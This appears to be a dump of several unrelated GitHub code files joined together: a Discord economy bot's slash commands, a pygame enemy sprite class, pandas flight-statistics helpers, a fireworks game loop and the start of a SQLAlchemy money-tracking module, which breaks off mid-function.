@app_commands.command(description=\"Sell an item from your inventory!\")\r\n @is_registered()\r\n async def sell(self, interaction: discord.Interaction, *, item: str):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n _item = item.lower()\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if _item in r.items:\r\n for item in items_list[\"Items\"].items():\r\n if item[0] == _item:\r\n item_prc = item[1][\"price\"] / 2\r\n\r\n await economy.add_money(interaction.user.id, \"bank\", item_prc)\r\n await economy.remove_item(interaction.user.id, item[0])\r\n\r\n embed.add_field(name=\"Success\", value=f\"Successfully sold **{item[0]}**!\")\r\n await interaction.response.send_message(embed=embed)\r\n break\r\n else:\r\n\r\n embed.add_field(name=\"Error\", value=f\"You don't have this item!\")\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\nclient = DiscordEconomyClient()\r\ntree = app_commands.CommandTree(client)\r\n\r\ntree.add_command(Shop(), guild=TEST_GUILD)\r\n\r\n\r\neconomy = Economy()\r\n# or if you want to use mongodb\r\n# economy = Economy(\"mongodb+srv://user:password@clusterIP/Database?retryWrites=true&w=majority\", database_name=\"Discord\")\r\n\r\n\r\n@tree.error\r\nasync def on_error(interaction: discord.Interaction, error: app_commands.AppCommandError):\r\n print(USER_COOLDOWNS)\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n embed.add_field(name=\"Error\", value=str(error))\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Check your balance.\")\r\n@is_registered()\r\nasync def balance(interaction: discord.Interaction, member: discord.Member = None):\r\n member = member or interaction.user\r\n\r\n await economy.is_registered(member.id)\r\n\r\n user_account = await economy.get_user(member.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.add_field(name=f\"{member.display_name}'s balance\", value=f\"\"\"Bank: **{user_account.bank}**\r\n Wallet: **{user_account.wallet}**\r\n Items: **{', '.join(user_account.items)}**\"\"\")\r\n\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Receive daily reward for some money.\")\r\n@is_registered()\r\n@cooldown(60)\r\nasync def reward(interaction: discord.Interaction):\r\n random_amount = random.randint(50, 150)\r\n await economy.add_money(interaction.user.id, \"wallet\", random_amount)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.add_field(name=f\"Reward\", value=f\"Successfully claimed reward!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Toss a coin.\")\r\n@is_registered()\r\nasync def coinflip(interaction: discord.Interaction, money: int, side: str):\r\n side = side.lower()\r\n random_arg = random.choice([\"tails\", \"heads\"])\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n if side == random_arg:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n\r\n embed.add_field(name=\"Coinflip\", value=f\"You won coinflip! - {random_arg}\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n else:\r\n await economy.remove_money(interaction.user.id, \"wallet\", money)\r\n\r\n embed.add_field(name=\"Coinflip\", value=f\"You lost coinflip! - {random_arg}\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n embed.add_field(name=\"Coinflip\", value=f\"You don't have enough money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Play some slots.\")\r\n@is_registered()\r\nasync def slots(interaction: discord.Interaction, money: int):\r\n random_slots_data = [None for _ in range(9)]\r\n i = 0\r\n for _ in random_slots_data:\r\n random_slots_data[i] = random.choice([\":tada:\", \":cookie:\", \":large_blue_diamond:\",\r\n \":money_with_wings:\", \":moneybag:\", \":cherries:\"])\r\n\r\n i += 1\r\n if i == len(random_slots_data):\r\n break\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n\r\n embed.add_field(name=\"Slots\", value=f\"\"\"{random_slots_data[0]} | {random_slots_data[1]} | {random_slots_data[2]}\r\n {random_slots_data[3]} | {random_slots_data[4]} | {random_slots_data[5]}\r\n {random_slots_data[6]} | {random_slots_data[7]} | {random_slots_data[8]}\r\n \"\"\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n if random_slots_data[3] == random_slots_data[4] and random_slots_data[5] == random_slots_data[3]:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n await interaction.followup.send(content=\"You won!\")\r\n\r\n else:\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n await interaction.followup.send(content=\"You lose!\")\r\n\r\n else:\r\n embed.add_field(name=\"Slots\", value=f\"You don't have enough money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Withdraw money from your account.\")\r\n@is_registered()\r\nasync def withdraw(interaction: discord.Interaction, money: int):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n await economy.add_money(interaction.user.id, \"wallet\", money)\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n\r\n embed.add_field(name=\"Withdraw\", value=f\"Successfully withdrawn {money} money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n\r\n embed.add_field(name=\"Withdraw\", value=f\"You don't have enough money to withdraw!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Deposit to your account.\")\r\n@is_registered()\r\nasync def deposit(interaction: discord.Interaction, money: int):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if not r.wallet >= money:\r\n embed.add_field(name=\"Deposit\", value=f\"You don't have enough money to deposit!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n return await interaction.response.send_message(embed=embed)\r\n\r\n await economy.add_money(interaction.user.id, \"bank\", money)\r\n await economy.remove_money(interaction.user.id, \"wallet\", money)\r\n\r\n embed.add_field(name=\"Deposit\", value=f\"Successfully deposited {money} money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Play some horse racing.\")\r\n@is_registered()\r\nasync def horse_racing(interaction: discord.Interaction, money: int):\r\n user = await economy.get_user(interaction.user.id)\r\n\r\n if not user.bank >= money:\r\n return await interaction.response.send_message(content=\"You don't have enough money to play.\")\r\n\r\n author_path = [\":horse_racing:\", \":blue_square:\", \":blue_square:\", \":blue_square:\", \":blue_square:\",\r\n \":blue_square:\",\r\n \":blue_square:\", \":blue_square:\", \":blue_square:\", \":blue_square:\", \" :checkered_flag:\"]\r\n\r\n enemy_path = [\":horse_racing:\", \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\",\r\n \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\", \" :checkered_flag:\"]\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.set_author(name=\"Horse race\")\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n\r\n await interaction.response.send_message(embed=embed)\r\n await asyncio.sleep(3)\r\n\r\n author_path[0] = \":blue_square:\"\r\n enemy_path[0] = \":red_square:\"\r\n\r\n author_path_update = random.randint(2, 6)\r\n enemy_path_update = random.randint(2, 6)\r\n\r\n author_path[author_path_update] = \":horse_racing:\"\r\n enemy_path[enemy_path_update] = \":horse_racing:\"\r\n\r\n embed.clear_fields()\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n\r\n await interaction.edit_original_message(embed=embed)\r\n await asyncio.sleep(3)\r\n\r\n author_path[author_path_update] = \":blue_square:\"\r\n enemy_path[enemy_path_update] = \":red_square:\"\r\n\r\n author_path_update = random.randint(author_path_update, 9)\r\n enemy_path_update = random.randint(enemy_path_update, 9)\r\n\r\n author_path[author_path_update] = \":horse_racing:\"\r\n enemy_path[enemy_path_update] = \":horse_racing:\"\r\n\r\n embed.clear_fields()\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n await interaction.edit_original_message(embed=embed)\r\n\r\n if author_path_update > enemy_path_update:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n\r\n await interaction.followup.send(content=\"You won!\")\r\n\r\n else:\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n\r\n await interaction.followup.send(content=\"You lose!\")\r\n\r\n\r\nasyncio.new_event_loop().run_until_complete(client.start(token=BOT_TOKEN, reconnect=True))\r\n","repo_name":"Nohet/DiscordEconomy","sub_path":"examples/dpy_base/slashCommands/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":17411,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"73705666085","text":"import math\nimport numpy as np\nfrom src.assets import *\nfrom random import randint\nfrom src.itemfiles.health import Health\nfrom src.itemfiles.gold import Gold\nfrom src.itemfiles.armor import Armor\nfrom src.itemfiles.attackdamage import AttackDamage\nfrom src.itemfiles.healthpotion import HealthPotion\n\n\nclass GreenEnemy(pygame.sprite.Sprite):\n def __init__(self, enemy_cords, enemy_group, dead_enemy_group, attack_group, item_group, player, stats):\n super().__init__(enemy_group)\n self.enemy_group = enemy_group\n self.dead_enemy_group = dead_enemy_group\n self.attack_group = attack_group\n self.item_group = item_group\n self.player = player\n self.stats = {key: value for key, value in stats.items()}\n self.speed = self.stats[\"speed\"]\n self.image = green_enemy_right\n self.rect = self.image.get_rect().move(enemy_cords[0], enemy_cords[1])\n self.origin_position = self.rect.center\n self.green_enemy_left_sprites = green_enemy_left_sprites\n self.green_enemy_right_sprites = green_enemy_right_sprites\n self.green_enemy_left_death_sprites = green_enemy_left_death_sprites\n self.green_enemy_right_death_sprites = green_enemy_right_death_sprites\n self.green_enemy_left_blow_sprites = green_enemy_left_blow_sprites\n self.green_enemy_right_blow_sprites = green_enemy_right_blow_sprites\n self.current_sprite = 0\n self.current_orientation = \"right\"\n self.current_direction = \"none\"\n self.timer = 0\n self.x_range = 0.3\n self.y_range = 0.3\n self.hit_box = self.rect\n self.mass = 1\n self.restitution = 0.8\n self.mask = pygame.mask.from_surface(self.image)\n self.jump_timer = np.random.uniform(75, 125)\n self.going_back = False\n self.going_back_timer = 0\n\n def move(self):\n if self.current_orientation == \"right\":\n self.image = self.green_enemy_right_sprites[1]\n if self.current_orientation == \"left\":\n self.image = self.green_enemy_left_sprites[1]\n self.move_def()\n\n def move_def(self):\n x_speed = (self.speed * self.x_range) / 3\n y_speed = (self.speed * self.y_range) / 4\n if self.current_direction == \"top-left\":\n self.rect.right -= x_speed\n self.rect.top -= y_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"bottom-left\":\n self.rect.right -= x_speed\n self.rect.top += y_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"top-right\":\n self.rect.right += x_speed\n self.rect.top -= y_speed\n self.current_orientation = \"right\"\n if self.current_direction == \"bottom-right\":\n self.rect.right += x_speed\n self.rect.top += y_speed\n self.current_orientation = \"right\"\n if self.current_direction == \"top\":\n self.rect.top -= y_speed\n if self.current_direction == \"bottom\":\n self.rect.top += y_speed\n if self.current_direction == \"left\":\n self.rect.right -= x_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"right\":\n self.rect.right += x_speed\n self.current_orientation = \"right\"\n\n def stand_right(self):\n self.speed = 0\n self.image = self.green_enemy_right_sprites[0]\n\n def stand_left(self):\n self.speed = 0\n self.image = self.green_enemy_left_sprites[0]\n\n def is_alive(self):\n if self.stats[\"health\"] <= 0:\n self.stats[\"health\"] = 0\n if self in self.enemy_group:\n self.enemy_group.remove(self)\n self.dead_enemy_group.add(self)\n self.player.xp += self.stats[\"xp\"]\n\n def wait(self):\n if self.going_back_timer < 60:\n self.going_back_timer += 1\n else:\n self.going_back = True\n\n def move_back(self):\n x_range = self.origin_position[0] - self.rect.centerx\n y_range = self.origin_position[1] - self.rect.centery\n xy_range = math.hypot(x_range, y_range)\n if xy_range != 0:\n x_range /= xy_range*15\n y_range /= xy_range*15\n x_speed = self.stats[\"speed\"] / 2.5 * x_range\n y_speed = self.stats[\"speed\"] / 2.5 * y_range\n self.rect.x += x_speed\n self.rect.y += y_speed\n if self.rect.centerx > self.origin_position[0]:\n self.current_orientation = \"left\"\n if self.rect.centerx < self.origin_position[0]:\n self.current_orientation = \"right\"\n\n def detect_collision(self):\n if self.rect.colliderect(self.player.rect) and not self.speed == 0:\n if self.mask.overlap(self.player.mask, (self.player.rect.x - self.rect.x, self.player.rect.y - self.rect.y)) and self.player.resurrect_animation is False and self.player.channeling is False:\n self.player.stats[\"health\"] -= self.stats[\"attack\"] * (1-(self.player.stats[\"armor\"]/(self.player.stats[\"armor\"]+99))) * self.player.stats[\"damage_reduction\"]\n if self in self.enemy_group:\n self.enemy_group.remove(self)\n self.dead_enemy_group.add(self)\n self.rect.top -= 20\n if not self.mask.overlap(self.player.mask, (self.player.rect.x - self.rect.x, self.player.rect.y - self.rect.y)):\n if math.hypot(self.player.rect.centerx - self.rect.centerx, self.player.rect.centery - self.rect.centery) <= 750:\n self.move()\n else:\n if not self.origin_position[0]-5 <= self.rect.centerx <= self.origin_position[0]+5 and not self.origin_position[1]-5 <= self.rect.centery <= self.origin_position[1]+5:\n if self.going_back:\n self.move_back()\n else:\n self.wait()\n else:\n self.going_back = False\n self.going_back_timer = 0\n self.speed -= self.timer\n self.timer += 1.5\n if self.speed <= 0:\n if self.current_orientation == \"right\":\n self.stand_right()\n if self.current_orientation == \"left\":\n self.stand_left()\n if self.timer >= self.jump_timer:\n self.check_direction()\n self.timer = 0\n\n def check_direction(self):\n self.x_range = (abs(self.rect.centerx - self.player.rect.centerx) + abs(self.rect.centerx - self.player.rect.centerx)) / 2000\n if self.x_range >= 0.6:\n self.x_range = 0.6\n self.y_range = (abs(self.rect.centery - self.player.rect.centery) + abs(self.rect.centery - self.player.rect.centery)) / 2000\n if self.y_range >= 0.6:\n self.y_range = 0.6\n self.speed = self.stats[\"speed\"]\n if self.rect.centerx > self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top-left\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom-left\"\n if self.rect.centery == self.player.rect.centery:\n self.current_direction = \"left\"\n if self.rect.centerx < self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top-right\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom-right\"\n if self.rect.centery == self.player.rect.centery:\n self.current_direction = \"right\"\n if self.rect.centerx == self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom\"\n\n def right_death_animation(self):\n self.current_sprite += 0.1\n if self.current_sprite >= len(self.green_enemy_right_death_sprites):\n self.kill()\n self.drop_loot()\n else:\n self.image = self.green_enemy_right_death_sprites[int(self.current_sprite)]\n\n def left_death_animation(self):\n self.current_sprite += 0.1\n if self.current_sprite >= len(self.green_enemy_left_death_sprites):\n self.kill()\n self.drop_loot()\n else:\n self.image = self.green_enemy_left_death_sprites[int(self.current_sprite)]\n\n def right_blow_animation(self):\n self.current_sprite += 0.15\n if self.current_sprite >= len(self.green_enemy_right_blow_sprites):\n self.kill()\n else:\n self.image = self.green_enemy_right_blow_sprites[int(self.current_sprite)]\n\n def left_blow_animation(self):\n self.current_sprite += 0.15\n if self.current_sprite >= len(self.green_enemy_left_blow_sprites):\n self.kill()\n else:\n self.image = self.green_enemy_left_blow_sprites[int(self.current_sprite)]\n\n def death_check(self):\n if self.stats[\"health\"] <= 0:\n if self.current_orientation == \"right\":\n self.right_death_animation()\n if self.current_orientation == \"left\":\n self.left_death_animation()\n else:\n if self.current_orientation == \"right\":\n self.right_blow_animation()\n if self.current_orientation == \"left\":\n self.left_blow_animation()\n\n def drop_loot(self):\n x = randint(0, 99)\n if x <= 10:\n Health(self.rect, self.item_group, self.player)\n elif 10 < x <= 20:\n Gold(self.rect, self.item_group, self.player, randint(50, 100))\n elif 20 < x <= 30:\n Armor(self.rect, self.item_group, self.player, 1)\n elif 30 < x <= 40:\n AttackDamage(self.rect, self.item_group, self.player, 1)\n elif 40 < x <= 50:\n HealthPotion(self.rect, self.item_group, self.player)\n\n def update(self):\n self.is_alive()\n self.detect_collision()\n","repo_name":"kajotkajot/PythonGame","sub_path":"src/enemyfiles/greenenemy.py","file_name":"greenenemy.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34512660935","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef get_stats(df, col):\n cnt = df.groupby(col).size().rename('Count')\n \n mittel = round(cnt.mean(),2)\n varianz = round(cnt.var(),2)\n std = round(cnt.std(),2)\n max_f = round(cnt.max(),2)\n min_f = round(cnt.min(),2)\n \n text = \"\\nMittelwert: \" + str(mittel) + \"\\n\"\n text += \"Varianz:\\t\" + str(varianz) + \"\\n\"\n text += \"Standardabweichung: \" + str(std)+\"\\n\"\n text += \"Max:\"+str(max_f)+\"\\nMin:\"+str(min_f)\n return text \n\ndef stats_destinations(df):\n var = round(df['count_destinations'].var(),2)\n std = round(df['count_destinations'].std(),2)\n mittel = round(df['count_destinations'].mean(),2)\n median = round(df['count_destinations'].median(),2)\n \n count = len(df);\n \n text = \"Anzahl Flughafen:\"+str(count)+\"\\n\"\n text += \"Mittelwert: \"+str(mittel)+\"\\n\"\n text += \"Median:\\t\"+str(median)+\"\\n\"\n text += \"Varianz:\\t\"+str(var)+\"\\n\"\n text += \"Standardabweichung: \"+str(std)\n return text\n\ndef bar_category_region(df):\n fig, axes = plt.subplots(ncols=2, figsize=(20,7))\n df['type'].value_counts().plot(kind='bar', ax=axes[0])\n _ = axes[0].set_title('Bar-Chart Airport Typen')\n _ = axes[0].set_ylabel('Anzahl Flughafen')\n \n df['region'].value_counts().plot(kind='bar', ax=axes[1])\n _ = axes[1].set_title(\"Flughäfen pro Land\")\n _ = axes[1].set_ylabel(\"Anzahl Flughäfen\")\n return fig\n\ndef airport_infos(df):\n text = \"Anzahl Flughafen total:\\t\"+ str(len(df)) + \"\\n\"\n text += \"Flughäfen für Flugzeuge:\"+str(len(df[df['type'] == 'small_airport'])+len(df[df['type'] == 'medium_airport'])+len(df[df['type'] == 'large_airport']))+\"\\n\\n\"\n \n text += \"Anzahl grosser Flughäfen: \"+str(len(df[df['type'] == 'large_airport'])) + \"\\n\"\n text += \"Anzahl kleiner & mittlerer Flughäfen: \"+str(len(df[df['type'] == 'small_airport'])+len(df[df['type'] == 'medium_airport']))+ \"\\n\"\n text += \"\\nAnzahl Flughäfen ohne Region/Continent: \" + str(len(df[(df['region'] != 'unkown') | (df['continent'].notnull())]))\n \n select = df.loc[df['region'] == 'unkown']\n mittel = select['total'].mean()\n text += \"\\nDurchschnitt der Takeoffs/Landings ohne Region/Continent: \"+str(mittel)+\"\\n\"\n \n return text\n \ndef flight_infos(df): \n df_mai = df.loc[df['day'] < '2021-06-01']\n df_sep = df.loc[df['day'] > '2021-06-01']\n \n cnt = df.groupby('day').size().rename('Count')\n cnt_mai = df_mai.groupby('day').size().rename('Count')\n cnt_sep = df_sep.groupby('day').size().rename('Count')\n \n std = round(cnt.std(),2)\n std_mai = round(cnt_mai.std(),2)\n std_sep = round(cnt_sep.std(),2)\n median = round(cnt.median(),2)\n mittel = round(cnt.mean(),2)\n \n median_mai = cnt_mai.median()\n mittel_mai = round(cnt_mai.mean(),2)\n \n median_sep = cnt_sep.median()\n mittel_sep = round(cnt_sep.mean(),2)\n \n length_mai = len(df.loc[df['day'] < '2021-06-01'])\n length_sep = len(df.loc[df['day'] > '2021-06-01'])\n \n text = \"Total FLugverbindungen: \"+str(len(df))+\"\\n\"\n text += \"Median:\\t\\t\\t\" + str(median)+\"\\n\"\n text += \"Mittelwert:\\t\\t\" + str(mittel)+\"\\n\"\n text += \"Standardabweichung:\\t\" + str(std)+\"\\n\\n\"\n \n text += \"FLugverbindungen im Mai: \"\n text += str(length_mai) + \"\\n\"\n text += \"Mittelwert:\\t\\t\" +str(mittel_mai) + \"\\n\"\n text += \"Median:\\t\\t\\t\"+str(median_mai) + \"\\n\"\n text += \"Standardabweichung:\\t\" + str(std_mai)+\"\\n\\n\"\n \n text += \"FLugverbindungen im Sep: \"\n text += str(length_sep) + \"\\n\"\n text += \"Mittelwert:\\t\\t\" +str(mittel_sep) + \"\\n\"\n text += \"Median:\\t\\t\\t\"+str(median_sep) + \"\\n\"\n text += \"Standardabweichung:\\t\" + str(std_sep)\n \n return text\n\ndef show_distribution(df_airports): \n df_takeoffs = df_airports.sort_values(['takeoffs'], ascending=False).head(60)\n fig, ax = plt.subplots(figsize=(15,5))\n _ = ax.bar(df_takeoffs['ident'], df_takeoffs['takeoffs'], width=0.6, label=\"Takeoff's\")\n _ = ax.bar(df_takeoffs['ident'], df_takeoffs['landings'], width=0.6, bottom=df_takeoffs['takeoffs'], label=\"Landings\")\n _ = ax.set_title(\"Anzahl Flugverkehr\")\n _ = ax.set_xlabel(\"Flughäfen\")\n _ = ax.set_ylabel(\"Anzahl Flüge (ein- und ausgehend)\")\n _ = ax.set_xticks(df_takeoffs['ident'])\n _ = ax.set_xticklabels(df_takeoffs['ident'],rotation=70)\n _ = ax.legend()\n return fig\n\ndef show_distribution_region(df_airports): \n o = df_airports.groupby(['region'], as_index=False)[['takeoffs', 'landings', 'total']].sum()\n g = o.plot(x='region', y=['takeoffs','landings'], kind='barh', width=.95, figsize=(10,8),fontsize=13).set(\n title='Flugverkehr nach Region', xlabel=\"Anzahl Flugverbindungen\", ylabel=\"Regionen\")\n return g\n\ndef show_cum_flights(df, title):\n cnt = df.groupby('day').size().rename('Count')\n hist = np.histogram(cnt)\n pv = np.cumsum(cnt)\n\n fig, ax = plt.subplots(figsize=(20,5))\n _ = ax.step(cnt.keys(), pv, where='pre', drawstyle='steps', label='Kumulative Verteilung')\n _ = ax.set_title(title)\n _ = ax.set_ylabel(\"Kumulative Verteilung\")\n _ = ax.set_xlabel(\"Datum\")\n \n return ax\n\ndef show_stats(df_flights):\n df_flights[\"day\"] = df_flights[\"day\"].astype(\"datetime64\")\n\n df_mai = df_flights.loc[df_flights['day'] < '2021-06-01']\n flights_m = df_mai.groupby([df_mai[\"day\"]]).size()\n df_sep = df_flights.loc[df_flights['day'] > '2021-06-01']\n flights_s = df_sep.groupby([df_sep[\"day\"]]).size()\n\n mittel_m = flights_m.mean()\n std_m = flights_m.std()\n mittel_s = flights_s.mean()\n std_s = flights_s.std()\n\n fig, ax = plt.subplots(ncols=2, figsize=(18,5))\n flights_m.plot(kind=\"bar\", width=.8, rot=85, title=\"Flugverbindungen Monat Mai\", xlabel=\"Tag\", ylabel=\"Anzahl Verbindungen\", ax=ax[0])\n xmin, xmax = ax[0].get_xlim()\n _ = ax[0].hlines(mittel_m, xmin, xmax, 'red', linestyle='-', label='Mittelwert')\n _ = ax[0].hlines(mittel_m-std_m, xmin, xmax, 'lightgreen', linestyle='--', label='Standardabweichung')\n _ = ax[0].hlines(mittel_m+std_m, xmin, xmax, 'lightgreen', linestyle='--')\n _ = ax[0].legend()\n\n flights_s.plot(kind=\"bar\", width=.8, rot=85, title=\"Flugverbindungen Monat Sep.\", xlabel=\"Tag\", ylabel=\"Anzahl Verbindungen\", ax=ax[1])\n xmin, xmax = ax[0].get_xlim()\n _ = ax[1].hlines(mittel_s, xmin, xmax, 'red', linestyle='-', label='Mittelwert')\n _ = ax[1].hlines(mittel_s-std_s, xmin, xmax, 'lightgreen', linestyle='--', label='Standardabweichung')\n _ = ax[1].hlines(mittel_s+std_s, xmin, xmax, 'lightgreen', linestyle='--')\n _ = ax[1].legend()\n \n return fig, mittel_m, mittel_s, std_m, std_s\n\ndef show_stats_destinations(df_airports):\n o = df_airports.groupby(['region'], as_index=False)[['count_destinations']].sum()\n g = o.plot(x='region', y='count_destinations', kind='barh', width=.95, figsize=(10,8),fontsize=13).set(\n title='Anzahl unterschiedlicher Destinationen nach Region', xlabel=\"Anzahl Destinationen\", ylabel=\"Regionen\")\n return g\n\ndef load_airports():\n df = pd.read_csv(\"data/preprocessed/airports.csv\")\n \n df['landings'] = df['landings'].astype(int)\n df['takeoffs'] = df['takeoffs'].astype(int)\n df['latitude'] = df['latitude'].astype(float)\n df['longitude'] = df['longitude'].astype(float)\n df['type'] = df['type'].astype('category')\n df['region'] = df['region'].astype('category')\n \n return df\n\ndef load_flights():\n df = pd.read_csv(\"data/preprocessed/flights.csv\")\n df['day'] = pd.to_datetime(df['day'])\n return df\n ","repo_name":"marcschny/DataStory_AirplaneHubs","sub_path":"AirplaneHubs/descriptive_stats.py","file_name":"descriptive_stats.py","file_ext":"py","file_size_in_byte":7697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"113048624","text":"import pygame\nfrom show_manager import Show_Manager\nfrom settings import HEIGHT, WIDTH, FPS\n\n\ndef initialize_pygame():\n pygame.init()\n window = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Fireworks\")\n pygame.font.init()\n\n return window\n\n\ndef main():\n window = initialize_pygame()\n show_manager = Show_Manager(window)\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_q]:\n pygame.quit()\n quit()\n\n if keys[pygame.K_r]:\n main()\n\n show_manager.update()\n show_manager.draw()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"unit0113/projects","sub_path":"Python_Playground/fireworks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2264263145","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nimport datetime\nimport re\n\neng = create_engine('mysql://root:mysql@localhost/moneykeeper?charset=utf8mb4')\ndb_session = scoped_session(sessionmaker(autoflush=False,\n bind=eng))\nmd = MetaData(bind=eng)\n\n\ndef show_month_dbt_crt(start_date, last_date) -> dict:\n \"\"\"Shows incomes and credits during date period\"\"\"\n sql_for_trans = '''SELECT date, transacion_type_id, SUM(value)\n FROM transaction\n WHERE date BETWEEN :w1 AND :w2\n AND transacion_type_id IN (:w3)\n GROUP BY date, transacion_type_id\n ORDER BY date, transacion_type_id'''\n\n res_trn = {'dbt': db_session.execute(sql_for_trans, {'w1': start_date, 'w2': last_date, 'w3': 1}).fetchall(),\n 'crt': db_session.execute(sql_for_trans, {'w1': start_date, 'w2': last_date, 'w3': 2}).fetchall(),\n 'sums': {\n 'plus': show_sums(start_date, last_date, 1),\n 'minus': show_sums(start_date, last_date, 2)\n }}\n\n return res_trn\n\n\ndef show_sums(fdate, ldate, trn_type_id: int) -> float:\n \"\"\"Shows sum per date period\"\"\"\n sql_for_sum = '''SELECT SUM(value)\n FROM transaction\n WHERE date BETWEEN :w1 AND :w2\n AND transacion_type_id = :w3'''\n sum_of_period = db_session.execute(sql_for_sum, {'w1': fdate, 'w2': ldate, 'w3': trn_type_id}).fetchone()\n if sum_of_period[0] is None:\n return 0\n else:\n return sum_of_period[0]\n\n\ndef add_trn_in_db(usr, trn_t_id, prc_id, d, val=0, acc_fr=1, comment=''):\n if type(d) != datetime.date:\n 